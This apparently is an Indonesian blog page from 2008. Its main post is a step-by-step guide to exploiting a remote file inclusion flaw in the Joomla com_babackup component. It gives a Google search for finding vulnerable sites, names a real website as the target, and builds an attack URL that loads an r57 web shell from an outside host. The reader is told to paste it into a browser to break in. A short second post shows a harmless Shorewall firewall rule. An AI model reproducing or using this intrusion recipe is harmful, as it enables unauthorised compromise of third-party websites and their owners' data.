March 30, 2008
Bugs On Joomla
Disini adalah contoh bugs yang terdapat pada CMS joomla di bagian "babackup" component joomla.
caranya mudah kok supaya bisa memakai bug itu cari aja software or components yang bersangkutan trus samain deh dengan bugnya .
http://www.milw0rm.com/exploits/2225 << dari sini kita bisa liat componenst yang berbug adalah com_babackup
nah kita pake key ini aja inurl:com_babackup
yang di dapat dari google.com
Index of /english/components/com_babackup
Index of /english/components/com_babackup. Name Last modified Size Description. Parent Directory 24-Jul-2007 10:13 -
www.myenglishgrammar.com/english/components/com_babackup/ - 1k - Tembolok - Halaman sejenis
xixi
coba kita samain dengan bug ya
Exploit:
http://www.site.com/[path]/administrator/components/
com_babackup/classes/Tar.php?mosConfig_absolute_path=http://site.com/evilscript.txt?
ok kita implementasikan ke site target tadi yang udah kita dapet di google
www.myenglishgrammar.com/english/administrator/components/
com_babackup/classes/Tar.php?mosConfig_absolute_path=
http://geocities.com/home_edition2001/r57.txt?
Tinggal copy paste di Addresbar dan coba liat hasilnya. Kalo beruntung bisa masuk lahh tuh exploit
March 29, 2008
Blok IP Local Dengan Shorewall
Untuk memblok IP local supaya tidak bisa akses ke Internet masukkan:
REJECT loc:192.168.1.12 net all
Masukkan rules di atas pada /etc/shorewall/rules setelah itu tinggal restart shorewall
Sumber : http://lists.shorewall.net/pipermail/shorewall-users/2005-May/018612.html

